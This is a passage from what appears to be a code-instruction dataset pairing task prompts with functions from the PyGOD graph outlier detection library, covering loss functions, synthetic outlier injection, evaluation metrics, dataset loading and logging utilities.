mean_x1).reshape(1,-1).matmul(torch.inverse(cov_x2)).matmul(mean_x2 -
mean_x1))
KL_loss = KL_loss.to(device)
return KL_loss | The local neighor distribution KL divergence loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb |
3,798 | import torch
import torch.nn.functional as F
from scipy.linalg import sqrtm
import math
The provided code snippet includes necessary dependencies for implementing the `W2_neighbor_loss` function. Write a Python function `def W2_neighbor_loss(predictions, targets, mask_len, device)` to solve the following problem:
The local neighor distribution W2 loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
Here is the function:
def W2_neighbor_loss(predictions, targets, mask_len, device):
"""
The local neighor distribution W2 loss used in GAD-NR.
Source:
https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb
"""
x1 = predictions.squeeze().cpu().detach()[:mask_len, :]
x2 = targets.squeeze().cpu().detach()[:mask_len, :]
mean_x1 = x1.mean(0)
mean_x2 = x2.mean(0)
nn = x1.shape[0]
cov_x1 = (x1-mean_x1).transpose(1,0).matmul(x1-mean_x1) / max((nn-1),1)
cov_x2 = (x2-mean_x2).transpose(1,0).matmul(x2-mean_x2) / max((nn-1),1)
W2_loss = torch.square(mean_x1-mean_x2).sum()
+ torch.trace(cov_x1 + cov_x2
+ 2 * sqrtm(sqrtm(cov_x1) @ (cov_x2.numpy()) @ (sqrtm(cov_x1))))
W2_loss = W2_loss.to(device)
return W2_loss | The local neighor distribution W2 loss used in GAD-NR. Source: https://github.com/Graph-COM/GAD-NR/blob/master/GAD-NR_inj_cora.ipynb |
3,799 | import torch
from torch_geometric.data import Data
from ..utils.utility import check_parameter
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
include_left=False, include_right=False):
"""Check if an input is within the defined range.
Parameters
----------
param : int, float
The input parameter to check.
low : int, float
The lower bound of the range.
high : int, float
The higher bound of the range.
param_name : str, optional (default='')
The name of the parameter.
include_left : bool, optional (default=False)
Whether includes the lower bound (lower bound <=).
include_right : bool, optional (default=False)
Whether includes the higher bound (<= higher bound).
Returns
-------
within_range : bool or raise errors
Whether the parameter is within the range of (low, high)
"""
# param, low and high should all be numerical
if not isinstance(param, (numbers.Integral, int, float)):
raise TypeError('{param_name} is set to {param} Not numerical'.format(
param=param, param_name=param_name))
if not isinstance(low, (numbers.Integral, int, float)):
raise TypeError('low is set to {low}. Not numerical'.format(low=low))
if not isinstance(high, (numbers.Integral, int, float)):
raise TypeError('high is set to {high}. Not numerical'.format(
high=high))
# at least one of the bounds should be specified
if low is MIN_INT and high is MAX_INT:
raise ValueError('Neither low nor high bounds is undefined')
# if wrong bound values are used
if low > high:
raise ValueError(
'Lower bound > Higher bound')
# value check under different bound conditions
if (include_left and include_right) and (param < low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (include_left and not include_right) and (
param < low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and include_right) and (
param <= low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and not include_right) and (
param <= low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
else:
return True
The provided code snippet includes necessary dependencies for implementing the `gen_structural_outlier` function. Write a Python function `def gen_structural_outlier(data, m, n, p=0, directed=False, seed=None)` to solve the following problem:
Generating structural outliers according to paper : cite:`ding2019deep`. We randomly select ``m`` nodes from the network and then make those nodes fully connected, and then all the ``m`` nodes in the clique are regarded as outliers. We iteratively repeat this process until a number of ``n`` cliques are generated and the total number of structural outliers is ``m * n``. Parameters ---------- data : torch_geometric.data.Data The input data. m : int Number nodes in the outlier cliques. n : int Number of outlier cliques. p : int, optional Probability of edge drop in cliques. Default: ``0``. directed : bool, optional Whether the edges added are directed. Default: ``False``. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The structural outlier graph with injected edges. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes.
Here is the function:
def gen_structural_outlier(data, m, n, p=0, directed=False, seed=None):
"""Generating structural outliers according to paper :
cite:`ding2019deep`. We randomly select ``m`` nodes from the network
and then make those nodes fully connected, and then all the ``m``
nodes in the clique are regarded as outliers. We iteratively repeat
this process until a number of ``n`` cliques are generated and the
total number of structural outliers is ``m * n``.
Parameters
----------
data : torch_geometric.data.Data
The input data.
m : int
Number nodes in the outlier cliques.
n : int
Number of outlier cliques.
p : int, optional
Probability of edge drop in cliques. Default: ``0``.
directed : bool, optional
Whether the edges added are directed. Default: ``False``.
seed : int, optional
The seed to control the randomness, Default: ``None``.
Returns
-------
data : torch_geometric.data.Data
The structural outlier graph with injected edges.
y_outlier : torch.Tensor
The outlier label tensor where 1 represents outliers and 0
represents normal nodes.
"""
if not isinstance(data, Data):
raise TypeError("data should be torch_geometric.data.Data")
if isinstance(m, int):
check_parameter(m, low=0, high=data.num_nodes, param_name='m')
else:
raise ValueError("m should be int, got %s" % m)
if isinstance(n, int):
check_parameter(n, low=0, high=data.num_nodes, param_name='n')
else:
raise ValueError("n should be int, got %s" % n)
check_parameter(m * n, low=0, high=data.num_nodes, param_name='m*n')
if seed:
torch.manual_seed(seed)
new_edges = []
outlier_idx = torch.randperm(data.num_nodes)[:m * n]
# connect all m nodes in each clique
for i in range(n):
new_edges.append(torch.combinations(outlier_idx[m * i: m * (i + 1)]))
new_edges = torch.cat(new_edges)
# drop edges with probability p
if p != 0:
indices = torch.randperm(len(new_edges))[:int((1-p) * len(new_edges))]
new_edges = new_edges[indices]
y_outlier = torch.zeros(data.x.shape[0], dtype=torch.long)
y_outlier[outlier_idx] = 1
if not directed:
new_edges = torch.cat([new_edges, new_edges.flip(1)], dim=0)
data.edge_index = torch.cat([data.edge_index, new_edges.T], dim=1)
return data, y_outlier | Generating structural outliers according to paper : cite:`ding2019deep`. We randomly select ``m`` nodes from the network and then make those nodes fully connected, and then all the ``m`` nodes in the clique are regarded as outliers. We iteratively repeat this process until a number of ``n`` cliques are generated and the total number of structural outliers is ``m * n``. Parameters ---------- data : torch_geometric.data.Data The input data. m : int Number nodes in the outlier cliques. n : int Number of outlier cliques. p : int, optional Probability of edge drop in cliques. Default: ``0``. directed : bool, optional Whether the edges added are directed. Default: ``False``. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The structural outlier graph with injected edges. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes. |
3,800 | import torch
from torch_geometric.data import Data
from ..utils.utility import check_parameter
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
include_left=False, include_right=False):
"""Check if an input is within the defined range.
Parameters
----------
param : int, float
The input parameter to check.
low : int, float
The lower bound of the range.
high : int, float
The higher bound of the range.
param_name : str, optional (default='')
The name of the parameter.
include_left : bool, optional (default=False)
Whether includes the lower bound (lower bound <=).
include_right : bool, optional (default=False)
Whether includes the higher bound (<= higher bound).
Returns
-------
within_range : bool or raise errors
Whether the parameter is within the range of (low, high)
"""
# param, low and high should all be numerical
if not isinstance(param, (numbers.Integral, int, float)):
raise TypeError('{param_name} is set to {param} Not numerical'.format(
param=param, param_name=param_name))
if not isinstance(low, (numbers.Integral, int, float)):
raise TypeError('low is set to {low}. Not numerical'.format(low=low))
if not isinstance(high, (numbers.Integral, int, float)):
raise TypeError('high is set to {high}. Not numerical'.format(
high=high))
# at least one of the bounds should be specified
if low is MIN_INT and high is MAX_INT:
raise ValueError('Neither low nor high bounds is undefined')
# if wrong bound values are used
if low > high:
raise ValueError(
'Lower bound > Higher bound')
# value check under different bound conditions
if (include_left and include_right) and (param < low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (include_left and not include_right) and (
param < low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and include_right) and (
param <= low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and not include_right) and (
param <= low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
else:
return True
The provided code snippet includes necessary dependencies for implementing the `gen_contextual_outlier` function. Write a Python function `def gen_contextual_outlier(data, n, k, seed=None)` to solve the following problem:
r"""Generating contextual outliers according to paper :cite:`ding2019deep`. We randomly select ``n`` nodes as the attribute perturbation candidates. For each selected node :math:`i`, we randomly pick another ``k`` nodes from the data and select the node :math:`j` whose attributes :math:`x_j` deviate the most from node :math:`i`'s attribute :math:`x_i` among ``k`` nodes by maximizing the Euclidean distance :math:`\| x_i − x_j \|`. Afterwards, we then substitute the attributes :math:`x_i` of node :math:`i` to :math:`x_j`. Parameters ---------- data : torch_geometric.data.Data The input data. n : int Number of nodes converting to outliers. k : int Number of candidate nodes for each outlier node. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The contextual outlier graph with modified node attributes. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes.
Here is the function:
def gen_contextual_outlier(data, n, k, seed=None):
r"""Generating contextual outliers according to paper
:cite:`ding2019deep`. We randomly select ``n`` nodes as the
attribute perturbation candidates. For each selected node :math:`i`,
we randomly pick another ``k`` nodes from the data and select the
node :math:`j` whose attributes :math:`x_j` deviate the most from
node :math:`i`'s attribute :math:`x_i` among ``k`` nodes by
maximizing the Euclidean distance :math:`\| x_i − x_j \|`.
Afterwards, we then substitute the attributes :math:`x_i` of node
:math:`i` to :math:`x_j`.
Parameters
----------
data : torch_geometric.data.Data
The input data.
n : int
Number of nodes converting to outliers.
k : int
Number of candidate nodes for each outlier node.
seed : int, optional
The seed to control the randomness, Default: ``None``.
Returns
-------
data : torch_geometric.data.Data
The contextual outlier graph with modified node attributes.
y_outlier : torch.Tensor
The outlier label tensor where 1 represents outliers and 0
represents normal nodes.
"""
if not isinstance(data, Data):
raise TypeError("data should be torch_geometric.data.Data")
if isinstance(n, int):
check_parameter(n, low=0, high=data.num_nodes, param_name='n')
else:
raise ValueError("n should be int, got %s" % n)
if isinstance(k, int):
check_parameter(k, low=0, high=data.num_nodes - n, param_name='k')
else:
raise ValueError("k should be int, got %s" % k)
if seed:
torch.manual_seed(seed)
outlier_idx = torch.randperm(data.num_nodes)[:n]
for i, idx in enumerate(outlier_idx):
candidate_idx = torch.randperm(data.num_nodes)[:k]
euclidean_dist = torch.cdist(data.x[idx].unsqueeze(0), data.x[
candidate_idx])
max_dist_idx = torch.argmax(euclidean_dist, dim=1)
max_dist_node = candidate_idx[max_dist_idx]
data.x[idx] = data.x[max_dist_node]
y_outlier = torch.zeros(data.x.shape[0], dtype=torch.long)
y_outlier[outlier_idx] = 1
return data, y_outlier | r"""Generating contextual outliers according to paper :cite:`ding2019deep`. We randomly select ``n`` nodes as the attribute perturbation candidates. For each selected node :math:`i`, we randomly pick another ``k`` nodes from the data and select the node :math:`j` whose attributes :math:`x_j` deviate the most from node :math:`i`'s attribute :math:`x_i` among ``k`` nodes by maximizing the Euclidean distance :math:`\| x_i − x_j \|`. Afterwards, we then substitute the attributes :math:`x_i` of node :math:`i` to :math:`x_j`. Parameters ---------- data : torch_geometric.data.Data The input data. n : int Number of nodes converting to outliers. k : int Number of candidate nodes for each outlier node. seed : int, optional The seed to control the randomness, Default: ``None``. Returns ------- data : torch_geometric.data.Data The contextual outlier graph with modified node attributes. y_outlier : torch.Tensor The outlier label tensor where 1 represents outliers and 0 represents normal nodes. |
3,801 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_roc_auc` function. Write a Python function `def eval_roc_auc(label, score)` to solve the following problem:
ROC-AUC score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- roc_auc : float Average ROC-AUC score across different labels.
Here is the function:
def eval_roc_auc(label, score):
"""
ROC-AUC score for binary classification.
Parameters
----------
label : torch.Tensor
Labels in shape of ``(N, )``, where 1 represents outliers,
0 represents normal instances.
score : torch.Tensor
Outlier scores in shape of ``(N, )``.
Returns
-------
roc_auc : float
Average ROC-AUC score across different labels.
"""
roc_auc = roc_auc_score(y_true=label, y_score=score)
return roc_auc | ROC-AUC score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- roc_auc : float Average ROC-AUC score across different labels. |
3,802 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_recall_at_k` function. Write a Python function `def eval_recall_at_k(label, score, k=None)` to solve the following problem:
Recall score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for recall. Default: ``None``. Returns ------- recall_at_k : float Recall for top k instances with the highest outlier scores.
Here is the function:
def eval_recall_at_k(label, score, k=None):
"""
Recall score for top k instances with the highest outlier scores.
Parameters
----------
label : torch.Tensor
Labels in shape of ``(N, )``, where 1 represents outliers,
0 represents normal instances.
score : torch.Tensor
Outlier scores in shape of ``(N, )``.
k : int, optional
The number of instances to evaluate. ``None`` for
recall. Default: ``None``.
Returns
-------
recall_at_k : float
Recall for top k instances with the highest outlier scores.
"""
if k is None:
k = sum(label)
recall_at_k = sum(label[score.topk(k).indices]) / sum(label)
return recall_at_k | Recall score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for recall. Default: ``None``. Returns ------- recall_at_k : float Recall for top k instances with the highest outlier scores. |
3,803 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_precision_at_k` function. Write a Python function `def eval_precision_at_k(label, score, k=None)` to solve the following problem:
Precision score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for precision. Default: ``None``. Returns ------- precision_at_k : float Precision for top k instances with the highest outlier scores.
Here is the function:
def eval_precision_at_k(label, score, k=None):
"""
Precision score for top k instances with the highest outlier scores.
Parameters
----------
label : torch.Tensor
Labels in shape of ``(N, )``, where 1 represents outliers,
0 represents normal instances.
score : torch.Tensor
Outlier scores in shape of ``(N, )``.
k : int, optional
The number of instances to evaluate. ``None`` for
precision. Default: ``None``.
Returns
-------
precision_at_k : float
Precision for top k instances with the highest outlier scores.
"""
if k is None:
k = sum(label)
precision_at_k = sum(label[score.topk(k).indices]) / k
return precision_at_k | Precision score for top k instances with the highest outlier scores. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. k : int, optional The number of instances to evaluate. ``None`` for precision. Default: ``None``. Returns ------- precision_at_k : float Precision for top k instances with the highest outlier scores. |
3,804 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_average_precision` function. Write a Python function `def eval_average_precision(label, score)` to solve the following problem:
Average precision score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- ap : float Average precision score.
Here is the function:
def eval_average_precision(label, score):
"""
Average precision score for binary classification.
Parameters
----------
label : torch.Tensor
Labels in shape of ``(N, )``, where 1 represents outliers,
0 represents normal instances.
score : torch.Tensor
Outlier scores in shape of ``(N, )``.
Returns
-------
ap : float
Average precision score.
"""
ap = average_precision_score(y_true=label, y_score=score)
return ap | Average precision score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. score : torch.Tensor Outlier scores in shape of ``(N, )``. Returns ------- ap : float Average precision score. |
3,805 | from sklearn.metrics import (
roc_auc_score,
average_precision_score,
f1_score
)
The provided code snippet includes necessary dependencies for implementing the `eval_f1` function. Write a Python function `def eval_f1(label, pred)` to solve the following problem:
F1 score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. pred : torch.Tensor Outlier prediction in shape of ``(N, )``. Returns ------- f1 : float F1 score.
Here is the function:
def eval_f1(label, pred):
"""
F1 score for binary classification.
Parameters
----------
label : torch.Tensor
Labels in shape of ``(N, )``, where 1 represents outliers,
0 represents normal instances.
pred : torch.Tensor
Outlier prediction in shape of ``(N, )``.
Returns
-------
f1 : float
F1 score.
"""
f1 = f1_score(y_true=label, y_pred=pred)
return f1 | F1 score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. pred : torch.Tensor Outlier prediction in shape of ``(N, )``. Returns ------- f1 : float F1 score. |
3,806 |
The provided code snippet includes necessary dependencies for implementing the `to_edge_score` function. Write a Python function `def to_edge_score(score, edge_index)` to solve the following problem:
Convert outlier node score to outlier edge score by averaging the scores of two nodes connected by an edge. Parameters ---------- score : torch.Tensor The node score. edge_index : torch.Tensor The edge index. Returns ------- score : torch.Tensor The edge score.
Here is the function:
def to_edge_score(score, edge_index):
"""Convert outlier node score to outlier edge score by averaging the
scores of two nodes connected by an edge.
Parameters
----------
score : torch.Tensor
The node score.
edge_index : torch.Tensor
The edge index.
Returns
-------
score : torch.Tensor
The edge score.
"""
score = (score[edge_index[0]] + score[edge_index[1]]) / 2
return score | Convert outlier node score to outlier edge score by averaging the scores of two nodes connected by an edge. Parameters ---------- score : torch.Tensor The node score. edge_index : torch.Tensor The edge index. Returns ------- score : torch.Tensor The edge score. |
3,807 |
The provided code snippet includes necessary dependencies for implementing the `to_graph_score` function. Write a Python function `def to_graph_score(score)` to solve the following problem:
Convert outlier node score to outlier graph score by averaging the scores of all nodes in a graph. Parameters ---------- score : torch.Tensor The node score. Returns ------- score : torch.Tensor The graph score.
Here is the function:
def to_graph_score(score):
"""Convert outlier node score to outlier graph score by averaging
the scores of all nodes in a graph.
Parameters
----------
score : torch.Tensor
The node score.
Returns
-------
score : torch.Tensor
The graph score.
"""
return score.mean(dim=-1) | Convert outlier node score to outlier graph score by averaging the scores of all nodes in a graph. Parameters ---------- score : torch.Tensor The node score. Returns ------- score : torch.Tensor The graph score. |
3,808 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
include_left=False, include_right=False):
"""Check if an input is within the defined range.
Parameters
----------
param : int, float
The input parameter to check.
low : int, float
The lower bound of the range.
high : int, float
The higher bound of the range.
param_name : str, optional (default='')
The name of the parameter.
include_left : bool, optional (default=False)
Whether includes the lower bound (lower bound <=).
include_right : bool, optional (default=False)
Whether includes the higher bound (<= higher bound).
Returns
-------
within_range : bool or raise errors
Whether the parameter is within the range of (low, high)
"""
# param, low and high should all be numerical
if not isinstance(param, (numbers.Integral, int, float)):
raise TypeError('{param_name} is set to {param} Not numerical'.format(
param=param, param_name=param_name))
if not isinstance(low, (numbers.Integral, int, float)):
raise TypeError('low is set to {low}. Not numerical'.format(low=low))
if not isinstance(high, (numbers.Integral, int, float)):
raise TypeError('high is set to {high}. Not numerical'.format(
high=high))
# at least one of the bounds should be specified
if low is MIN_INT and high is MAX_INT:
raise ValueError('Neither low nor high bounds is undefined')
# if wrong bound values are used
if low > high:
raise ValueError(
'Lower bound > Higher bound')
# value check under different bound conditions
if (include_left and include_right) and (param < low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (include_left and not include_right) and (
param < low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of [{low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and include_right) and (
param <= low or param > high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}].'.format(
param=param, low=low, high=high, param_name=param_name))
elif (not include_left and not include_right) and (
param <= low or param >= high):
raise ValueError(
'{param_name} is set to {param}. '
'Not in the range of ({low}, {high}).'.format(
param=param, low=low, high=high, param_name=param_name))
else:
return True
The provided code snippet includes necessary dependencies for implementing the `validate_device` function. Write a Python function `def validate_device(gpu_id)` to solve the following problem:
Validate the input GPU ID is valid on the given environment. If no GPU is presented, return 'cpu'. Parameters ---------- gpu_id : int GPU ID to check. Returns ------- device : str Valid device, e.g., 'cuda:0' or 'cpu'.
Here is the function:
def validate_device(gpu_id):
"""Validate the input GPU ID is valid on the given environment.
If no GPU is presented, return 'cpu'.
Parameters
----------
gpu_id : int
GPU ID to check.
Returns
-------
device : str
Valid device, e.g., 'cuda:0' or 'cpu'.
"""
# cast to int for checking
gpu_id = int(gpu_id)
# if it is cpu
if gpu_id == -1:
return 'cpu'
# if gpu is available
if torch.cuda.is_available():
# check if gpu id is between 0 and the total number of GPUs
check_parameter(gpu_id, 0, torch.cuda.device_count(),
param_name='gpu id', include_left=True,
include_right=False)
device = 'cuda:{}'.format(gpu_id)
else:
if gpu_id != 'cpu':
warnings.warn('The cuda is not available. Set to cpu.')
device = 'cpu'
return device | Validate the input GPU ID is valid on the given environment. If no GPU is presented, return 'cpu'. Parameters ---------- gpu_id : int GPU ID to check. Returns ------- device : str Valid device, e.g., 'cuda:0' or 'cpu'. |
3,809 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `load_data` function. Write a Python function `def load_data(name, cache_dir=None)` to solve the following problem:
Data loading function. See `data repository <https://github.com/pygod-team/data>`_ for supported datasets. For injected/generated datasets, the labels meanings are as follows. - 0: inlier - 1: contextual outlier only - 2: structural outlier only - 3: both contextual outlier and structural outlier Parameters ---------- name : str The name of the dataset. cache_dir : str, optional The directory for dataset caching. Default: ``None``. Returns ------- data : torch_geometric.data.Data The outlier dataset. Examples -------- >>> from pygod.utils import load_data >>> data = load_data(name='weibo') # in PyG format >>> y = data.y.bool() # binary labels (inlier/outlier) >>> yc = data.y >> 0 & 1 # contextual outliers >>> ys = data.y >> 1 & 1 # structural outliers
Here is the function:
def load_data(name, cache_dir=None):
"""
Data loading function. See `data repository
<https://github.com/pygod-team/data>`_ for supported datasets.
For injected/generated datasets, the labels meanings are as follows.
- 0: inlier
- 1: contextual outlier only
- 2: structural outlier only
- 3: both contextual outlier and structural outlier
Parameters
----------
name : str
The name of the dataset.
cache_dir : str, optional
The directory for dataset caching.
Default: ``None``.
Returns
-------
data : torch_geometric.data.Data
The outlier dataset.
Examples
--------
>>> from pygod.utils import load_data
>>> data = load_data(name='weibo') # in PyG format
>>> y = data.y.bool() # binary labels (inlier/outlier)
>>> yc = data.y >> 0 & 1 # contextual outliers
>>> ys = data.y >> 1 & 1 # structural outliers
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.pygod/data')
file_path = os.path.join(cache_dir, name+'.pt')
zip_path = os.path.join(cache_dir, name+'.pt.zip')
if os.path.exists(file_path):
data = torch.load(file_path)
else:
url = "https://github.com/pygod-team/data/raw/main/" + name + ".pt.zip"
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
r = requests.get(url, stream=True)
if r.status_code != 200:
raise RuntimeError("Failed downloading url %s" % url)
with open(zip_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
shutil.unpack_archive(zip_path, cache_dir)
data = torch.load(file_path)
return data | Data loading function. See `data repository <https://github.com/pygod-team/data>`_ for supported datasets. For injected/generated datasets, the labels meanings are as follows. - 0: inlier - 1: contextual outlier only - 2: structural outlier only - 3: both contextual outlier and structural outlier Parameters ---------- name : str The name of the dataset. cache_dir : str, optional The directory for dataset caching. Default: ``None``. Returns ------- data : torch_geometric.data.Data The outlier dataset. Examples -------- >>> from pygod.utils import load_data >>> data = load_data(name='weibo') # in PyG format >>> y = data.y.bool() # binary labels (inlier/outlier) >>> yc = data.y >> 0 & 1 # contextual outliers >>> ys = data.y >> 1 & 1 # structural outliers |
3,810 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `logger` function. Write a Python function `def logger(epoch=0, loss=0, score=None, target=None, time=None, verbose=0, train=True, deep=True)` to solve the following problem:
Logger for detector. Parameters ---------- epoch : int, optional The current epoch. loss : float, optional The current epoch loss value. score : torch.Tensor, optional The current outlier scores. target : torch.Tensor, optional The ground truth labels. time : float, optional The current epoch time. verbose : int, optional Verbosity mode. Range in [0, 3]. Larger value for printing out more log information. Default: ``0``. train : bool, optional Whether the logger is used for training. deep : bool, optional Whether the logger is used for deep detector.
Here is the function:
def logger(epoch=0,
loss=0,
score=None,
target=None,
time=None,
verbose=0,
train=True,
deep=True):
"""
Logger for detector.
Parameters
----------
epoch : int, optional
The current epoch.
loss : float, optional
The current epoch loss value.
score : torch.Tensor, optional
The current outlier scores.
target : torch.Tensor, optional
The ground truth labels.
time : float, optional
The current epoch time.
verbose : int, optional
Verbosity mode. Range in [0, 3]. Larger value for printing out
more log information. Default: ``0``.
train : bool, optional
Whether the logger is used for training.
deep : bool, optional
Whether the logger is used for deep detector.
"""
if verbose > 0:
if deep:
if train:
print("Epoch {:04d}: ".format(epoch), end='')
else:
print("Test: ", end='')
if isinstance(loss, tuple):
print("Loss I {:.4f} | Loss O {:.4f} | "
.format(loss[0], loss[1]), end='')
else:
print("Loss {:.4f} | ".format(loss), end='')
if verbose > 1:
if target is not None:
auc = eval_roc_auc(target, score)
print("AUC {:.4f}".format(auc), end='')
if verbose > 2:
if target is not None:
pos_size = target.nonzero().size(0)
rec = eval_recall_at_k(target, score, pos_size)
pre = eval_precision_at_k(target, score, pos_size)
ap = eval_average_precision(target, score)
contamination = sum(target) / len(target)
threshold = np.percentile(score,
100 * (1 - contamination))
pred = (score > threshold).long()
f1 = eval_f1(target, pred)
print(" | Recall {:.4f} | Precision {:.4f} "
"| AP {:.4f} | F1 {:.4f}"
.format(rec, pre, ap, f1), end='')
if time is not None:
print(" | Time {:.2f}".format(time), end='')
print() | Logger for detector. Parameters ---------- epoch : int, optional The current epoch. loss : float, optional The current epoch loss value. score : torch.Tensor, optional The current outlier scores. target : torch.Tensor, optional The ground truth labels. time : float, optional The current epoch time. verbose : int, optional Verbosity mode. Range in [0, 3]. Larger value for printing out more log information. Default: ``0``. train : bool, optional Whether the logger is used for training. deep : bool, optional Whether the logger is used for deep detector. |
3,811 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `init_detector` function. Write a Python function `def init_detector(name, **kwargs)` to solve the following problem:
Detector initialization function.
Here is the function:
def init_detector(name, **kwargs):
"""
Detector initialization function.
"""
module = import_module('pygod.detector')
assert name in module.__all__, "Detector {} not found".format(name)
return getattr(module, name)(**kwargs) | Detector initialization function. |
3,812 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `init_nn` function. Write a Python function `def init_nn(name, **kwargs)` to solve the following problem:
Neural network initialization function.
Here is the function:
def init_nn(name, **kwargs):
"""
Neural network initialization function.
"""
module = import_module('pygod.nn')
assert name in module.__all__, "Neural network {} not found".format(name)
return getattr(module, name)(**kwargs) | Neural network initialization function. |
3,813 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `pprint` function. Write a Python function `def pprint(params, offset=0, printer=repr)` to solve the following problem:
Pretty print the dictionary 'params' Parameters ---------- params : dict The dictionary to pretty print offset : int, optional The offset at the beginning of each line. printer : callable, optional The function to convert entries to strings, typically the builtin str or repr.
Here is the function:
def pprint(params, offset=0, printer=repr):
"""Pretty print the dictionary 'params'
Parameters
----------
params : dict
The dictionary to pretty print
offset : int, optional
The offset at the beginning of each line.
printer : callable, optional
The function to convert entries to strings, typically
the builtin str or repr.
"""
params_list = list()
this_line_length = offset
line_sep = ',\n' + (1 + offset) * ' '
for i, (k, v) in enumerate(sorted(params.items())):
if type(v) is float:
# use str for representing floating point numbers
# this way we get consistent representation across
# architectures and versions.
this_repr = '%s=%s' % (k, str(v))
else:
# use repr of the rest
this_repr = '%s=%s' % (k, printer(v))
if len(this_repr) > 500:
this_repr = this_repr[:300] + '...' + this_repr[-100:]
if i > 0:
if this_line_length + len(this_repr) >= 75 or '\n' in this_repr:
params_list.append(line_sep)
this_line_length = len(line_sep)
else:
params_list.append(', ')
this_line_length += 2
params_list.append(this_repr)
this_line_length += len(this_repr)
